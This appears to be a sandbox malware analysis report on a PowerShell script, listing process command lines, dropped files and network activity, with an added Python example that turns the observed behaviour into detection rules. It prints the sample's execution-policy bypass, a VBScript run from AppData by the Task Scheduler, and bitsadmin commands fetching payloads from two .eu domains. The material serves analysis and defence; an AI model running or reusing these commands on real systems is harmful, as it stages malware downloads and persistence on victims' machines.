File name: eval_yzDGqWab.jpg.cynet

Full analysis: https://app.any.run/tasks/84b07074-b8e4-4d46-b7c7-37e369e5d90b
Verdict: Malicious activity
Analysis date: June 23, 2025, 11:35:22
OS: Windows 10 Professional (build: 19044, 64 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF, LF line terminators
MD5: 653FB92824F80EBBD8D83727E2A34312
SHA1: F4834A5677DFD6F9BFE316141D821DD56FF04343
SHA256: 6CFC9F82ED0F141118D393C192EBCAB204F52BB291D2C8F3CA39202DB3E20C7D
SSDEEP: 3072:15IWXXFSOxAJ0t+5IRm6FbMTiUJ0bzoLaBse+hDwQ45MRMOAnU5ViEpNlJNrN:1BXInitllF4TPJzODsT1onU5ViEpNlJL

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 1828)
      • powershell.exe (PID: 6948)
    • Uses Task Scheduler to run other applications

      • powershell.exe (PID: 1828)
    • Changes powershell execution policy (Bypass)

      • wscript.exe (PID: 3652)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 6948)
    • Downloads files via BITSADMIN.EXE

      • cmd.exe (PID: 724)
      • cmd.exe (PID: 3724)
  • SUSPICIOUS

    • Modifies existing scheduled task

      • schtasks.exe (PID: 6936)
    • Lists all scheduled tasks in specific format

      • schtasks.exe (PID: 4116)
    • The process executes via Task Scheduler

      • wscript.exe (PID: 3652)
    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 3652)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 3652)
    • The process executes Powershell scripts

      • wscript.exe (PID: 3652)
    • Starts a new process with hidden mode (POWERSHELL)

      • powershell.exe (PID: 6948)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 6948)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6948)
    • Gets content of a file (POWERSHELL)

      • powershell.exe (PID: 6948)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 6948)
  • INFO

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 1828)
      • powershell.exe (PID: 6948)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 1828)
    • Gets or sets the time when the file was last written to (POWERSHELL)

      • powershell.exe (PID: 1828)
    • Launching a file from Task Scheduler

      • powershell.exe (PID: 1828)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 6948)
    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 6948)
    • Uses BITSADMIN.EXE

      • cmd.exe (PID: 5348)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes: 156
Monitored processes: 20
Malicious processes: 2
Suspicious processes: 3

Behavior graph

Processes as listed in the graph: powershell.exe, conhost.exe, schtasks.exe, schtasks.exe, conhost.exe, schtasks.exe, conhost.exe, wscript.exe, powershell.exe, conhost.exe, cmd.exe, conhost.exe, cmd.exe, conhost.exe, cmd.exe, conhost.exe, bitsadmin.exe, bitsadmin.exe, bitsadmin.exe, slui.exe

Process information

PID | CMD | Path | Indicators | Parent process
PID: 320
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 724
CMD: "C:\WINDOWS\system32\cmd.exe" /C bitsadmin /transfer zNOdDXiT /download /priority FOREGROUND "https://uyiuwbn.eu/topic//main.php?ch=1&i=c4f31a43a35aef9b71ec37ddb12eed73" C:\users\admin\AppData\Roaming\spoolsv\0_spoolsv.log
Path: C:\Windows\System32\cmd.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
PID: 1128
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 1828
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\AppData\Local\Temp\eval_yzDGqWab.jpg.cynet.ps1
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
4294967295
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
PID: 2072
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: schtasks.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 2072
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 2580
CMD: bitsadmin /transfer zNOdDXiT /download /priority FOREGROUND "https://uyiuwbn.eu/topic//main.php?ch=1&i=c4f31a43a35aef9b71ec37ddb12eed73" C:\users\admin\AppData\Roaming\spoolsv\0_spoolsv.log
Path: C:\Windows\System32\bitsadmin.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Version:
7.8.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\bitsadmin.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\sspicli.dll
PID: 3580
CMD: bitsadmin /transfer hBMylZGu /download /priority FOREGROUND "https://uognbcg.eu/topic//main.php?ch=1&i=c4f31a43a35aef9b71ec37ddb12eed73" C:\users\admin\AppData\Roaming\spoolsv\1_spoolsv.log
Path: C:\Windows\System32\bitsadmin.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Version:
7.8.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\bitsadmin.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\sspicli.dll
PID: 3652
CMD: "C:\WINDOWS\system32\wscript.EXE" /E:vbscript c:\users\admin\AppData\Roaming\\spoolsv\ArGwaQsV.tmp
Path: C:\Windows\System32\wscript.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 3724
CMD: "C:\WINDOWS\system32\cmd.exe" /C bitsadmin /transfer hBMylZGu /download /priority FOREGROUND "https://uognbcg.eu/topic//main.php?ch=1&i=c4f31a43a35aef9b71ec37ddb12eed73" C:\users\admin\AppData\Roaming\spoolsv\1_spoolsv.log
Path: C:\Windows\System32\cmd.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
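The command lines in the process table above give the sample's whole staging chain: PowerShell started from explorer.exe with the execution policy bypassed, a VBScript dropped under AppData\Roaming\spoolsv with a .tmp name and later run by wscript.exe /E:vbscript out of the Task Scheduler, and cmd.exe driving bitsadmin /transfer to pull two payloads into that same directory. The block below is an added example, not code from the ANY.RUN report or from the sample, showing how a detection engineer would turn those observations into command-line rules. The process records are transcribed from the report, except the last one, which is a constructed benign control; the rule names, weights and regular expressions are this example's own assumptions.

```python
"""Command-line heuristics over the process records in this report.

Added example: not code from the ANY.RUN report or from the sample it
describes. SAMPLE_PROCESSES is transcribed from the report's process table,
except the last record, which is a constructed benign control. The rule
names, weights and regular expressions are this example's own assumptions.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    image: str    # executable basename
    cmdline: str
    parent: str   # parent image name, as the report gives it


# Transcribed from the report: (PID, image, command line, parent image).
SAMPLE_PROCESSES = [
    Proc(1828, "powershell.exe",
         r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass '
         r'C:\Users\admin\AppData\Local\Temp\eval_yzDGqWab.jpg.cynet.ps1', "explorer.exe"),
    Proc(3652, "wscript.exe",
         r'"C:\WINDOWS\system32\wscript.EXE" /E:vbscript '
         r'c:\users\admin\AppData\Roaming\\spoolsv\ArGwaQsV.tmp', "svchost.exe"),
    Proc(724, "cmd.exe",
         r'"C:\WINDOWS\system32\cmd.exe" /C bitsadmin /transfer zNOdDXiT /download /priority FOREGROUND '
         r'"https://uyiuwbn.eu/topic//main.php?ch=1&i=c4f31a43a35aef9b71ec37ddb12eed73" '
         r'C:\users\admin\AppData\Roaming\spoolsv\0_spoolsv.log', "powershell.exe"),
    Proc(3580, "bitsadmin.exe",
         r'bitsadmin /transfer hBMylZGu /download /priority FOREGROUND '
         r'"https://uognbcg.eu/topic//main.php?ch=1&i=c4f31a43a35aef9b71ec37ddb12eed73" '
         r'C:\users\admin\AppData\Roaming\spoolsv\1_spoolsv.log', "cmd.exe"),
    Proc(320, "conhost.exe",
         r"\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1", "cmd.exe"),
    # Constructed benign control, not from the report: signed-policy run from Program Files.
    Proc(9999, "powershell.exe",
         r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy AllSigned '
         r'"C:\Program Files\Vendor\update.ps1"', "services.exe"),
]

TOKEN = re.compile(r'"([^"]*)"|(\S+)')
# Any path under a user's AppData tree (Local, Roaming, ...) counts as user-writable staging.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\", re.I)
# -ep, -ex, -exec, -executionpolicy ... followed by bypass (PowerShell accepts unique prefixes).
EXEC_POLICY_BYPASS = re.compile(r"-e[xp]\w*\s+bypass\b", re.I)


def tokens(cmdline):
    """Split a Windows command line into arguments, honouring double quotes."""
    return [quoted or bare for quoted, bare in TOKEN.findall(cmdline)]


def bits_transfer(p):
    """Return (url, destination) for a `bitsadmin /transfer` download, else None.
    The positional form is `/transfer <job> [switches] <remote URL> <local path>`, so the
    URL and destination are the last two arguments whatever switches precede them."""
    toks = tokens(p.cmdline)
    low = [t.lower() for t in toks]
    if not any(t in ("bitsadmin", "bitsadmin.exe") or t.endswith("\\bitsadmin.exe") for t in low):
        return None
    if "/transfer" not in low or len(toks) < 2 or not re.match(r"https?://", toks[-2], re.I):
        return None
    return toks[-2], toks[-1]


def rule_ps_execution_policy_bypass(p):
    return p.image.lower() == "powershell.exe" and bool(EXEC_POLICY_BYPASS.search(p.cmdline))


def rule_bits_download_to_user_path(p):
    hit = bits_transfer(p)
    return hit is not None and bool(USER_WRITABLE.search(hit[1]))


def rule_script_host_from_appdata(p):
    """wscript/cscript running a script out of AppData. The /E:vbscript override is what lets
    the sample keep its VBScript under a .tmp name, so the rule keys on location, not extension."""
    if p.image.lower() not in ("wscript.exe", "cscript.exe"):
        return False
    toks = tokens(p.cmdline)
    return len(toks) > 1 and bool(USER_WRITABLE.search(toks[-1]))


# Rule name -> (predicate, weight). Weights are illustrative.
RULES = {
    "ps_execution_policy_bypass": (rule_ps_execution_policy_bypass, 3),
    "bits_download_to_user_path": (rule_bits_download_to_user_path, 4),
    "script_host_from_appdata": (rule_script_host_from_appdata, 3),
}


def evaluate(procs):
    """Map each PID to the names of the rules it triggers (empty list when clean)."""
    return {p.pid: [name for name, (fn, _) in RULES.items() if fn(p)] for p in procs}


def score(procs):
    """Sum of the weights of every rule hit across the process set."""
    return sum(w for p in procs for fn, w in RULES.values() if fn(p))


def download_endpoints(procs):
    """Distinct (URL, local path) pairs from bitsadmin transfers: the staging seen in the report."""
    found = set()
    for p in procs:
        hit = bits_transfer(p)
        if hit is not None:
            found.add(hit)
    return sorted(found)


if __name__ == "__main__":
    print(evaluate(SAMPLE_PROCESSES), score(SAMPLE_PROCESSES), download_endpoints(SAMPLE_PROCESSES))
```

The rules deliberately key on argument position and file location rather than on the job names (zNOdDXiT, hBMylZGu), the file names or the domains, all of which are per-run values that rotate; what stays constant is a BITS job whose destination is user-writable, a script host reading out of AppData, and a policy bypass on the PowerShell command line. The parent chain the report shows (explorer.exe > powershell.exe > cmd.exe > bitsadmin.exe, and svchost.exe, that is the Task Scheduler, > wscript.exe) is the second axis a production rule would add.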
Total events: 12 497
Read events: 12 497
Write events: 0
Delete events: 0

Modification events

No data
Executable files: 0
Suspicious files: 4
Text files: 10
Unknown types: 0

Dropped files

PID | Process | Filename | Type
1828 | powershell.exe | C:\Users\admin\AppData\Roaming\spoolsv\ArGwaQsV.tmp | text
MD5: F8E3C12689023D0EBF9FBDEB92644A8D
SHA256: 53E124E18AC7386799FF27D58889F27E99DA0955ED4F11C39591422298AB69F0
1828 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms | binary
MD5: 6CB92D87B1B5FDFC7B6F354994066FBE
SHA256: 3B6E6B67E9A1F0CF41A7E8B777B36FEDA4BFE4DBAF4963AD5DD3AA5E554B1CE4
1828 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_set3kutw.uyv.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1828 | powershell.exe | C:\Users\admin\AppData\Roaming\spoolsv\main.ini | text
MD5: EB923F8D975EC2D1178BE08642432D39
SHA256: 97E3D8F838205FA786BA4368D8C83DDC4587CD9A86F3511C1B6AB92E3594AAC1
1828 | powershell.exe | C:\Users\admin\AppData\Roaming\spoolsv\domain.ini | text
MD5: 5036E53469A837094EBE6AB8A25F39C6
SHA256: 4D1B302051FC22C584C464C89CE87E292977738EE967E2BEFC3A6BF21827F270
1828 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_mfedtqsj.hod.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6948 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_h2vfwnjr.21g.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6948 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary
MD5: C904B83F3EB6B36C24B175843EAE2F18
SHA256: AE9C3B418FC314078AEA3B8FE77670BDBD72E127D1DAE886D031A73C2074B64F
6948 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_z55mjraw.gqp.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1828 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2DQONSONTBIFO0ZQWGUF.temp | binary
MD5: 6CB92D87B1B5FDFC7B6F354994066FBE
SHA256: 3B6E6B67E9A1F0CF41A7E8B777B36FEDA4BFE4DBAF4963AD5DD3AA5E554B1CE4

The __PSScriptPolicyTest_*.ps1/.psm1 files in Temp are written by PowerShell itself at startup to probe the AppLocker/WDAC script policy, and the ModuleAnalysisCache and CustomDestinations jump-list entries are ordinary side effects of the PowerShell session; the sample's own drops are the three files under AppData\Roaming\spoolsv, of which ArGwaQsV.tmp is the VBScript that the Task Scheduler later runs through wscript.exe /E:vbscript.
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 5
TCP/UDP connections: 22
DNS requests: 17
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
1268 | svchost.exe | GET | 200 | 2.18.121.147:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | | | whitelisted
1148 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | | | whitelisted
1268 | svchost.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | | | whitelisted
1148 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | | | whitelisted
3100 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | | | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | | | | whitelisted
5944 | MoUsoCoreWorker.exe | 40.127.240.158:443 | | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
1812 | RUXIMICS.exe | 40.127.240.158:443 | | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
1268 | svchost.exe | 40.127.240.158:443 | | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
4 | System | 192.168.100.255:138 | | | | whitelisted
1268 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
1268 | svchost.exe | 2.18.121.147:80 | crl.microsoft.com | AKAMAI-AS | FR | whitelisted
1268 | svchost.exe | 2.23.246.101:80 | www.microsoft.com | Ooredoo Q.S.C. | QA | whitelisted
5944 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
1148 | SIHClient.exe | 4.245.163.56:443 | slscr.update.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 216.58.212.174
whitelisted
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.104.136.2
whitelisted
crl.microsoft.com
  • 2.18.121.147
  • 2.18.121.139
whitelisted
www.microsoft.com
  • 2.23.246.101
  • 95.101.149.131
whitelisted
slscr.update.microsoft.com
  • 4.245.163.56
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted
wGr.com
  • 172.104.149.86
  • 172.104.251.198
  • 139.162.174.209
  • 139.162.181.76
unknown
login.live.com
  • 20.190.159.75
  • 20.190.159.128
  • 40.126.31.67
  • 40.126.31.73
  • 20.190.159.0
  • 20.190.159.130
  • 20.190.159.23
  • 40.126.31.69
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
uognbcg.eu
unknown

Threats

No threats detected
No debug info